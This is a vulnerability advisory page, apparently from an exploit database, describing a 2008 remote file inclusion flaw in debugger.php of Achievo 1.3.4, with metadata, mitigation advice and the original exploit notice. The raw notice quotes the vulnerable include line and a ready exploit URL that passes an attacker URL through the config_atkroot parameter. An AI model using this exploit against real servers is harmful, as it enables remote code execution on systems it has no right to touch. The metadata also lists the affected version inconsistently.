Achievo 1.3.4(debugger.php) Remote File Include Vulnerability

vendor:

Achievo

by:

M3NW5

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Achievo

Affected Version From: 1.3.2004

Affected Version To: 1.3.2004

Patch Exists: Yes

Related CWE: N/A

CPE: a:achievo:achievo:1.3.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Achievo 1.3.4(debugger.php) Remote File Include Vulnerability

Achievo 1.3.4 is vulnerable to a Remote File Include vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the config_atkroot parameter of the debugger.php script. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Achievo 1.3.4 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

#############################################################
Achievo 1.3.4(debugger.php) Remote File Include Vulnerability
#############################################################
Author	 : M3NW5
Homepage : http://www.indonesiancoder.com
contach  : m3nw5@hackermail.com
Location : INDONESIA
#############################################################
Achievo 1.3.4 Information
#############################################################
Vendor	 : http://www.achievo.org/
Scripts  : http://www.achievo.org/download/
File	 : debugger.php
	   include_once($config_atkroot."atk/include/initial.inc");
Exploit	 : http://target.com/path/debugger.php?config_atkroot=<deviL>
#############################################################
thenqyu	 : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9
	   Don Tukulesto.KaMtiEz.Vyc0d.Arianom.Denbayan.mistersaint
	   gonzhack.cyb3r_tr0n.m364tr0n.
	   YogyaCarderLink.v3n0m
#############################################################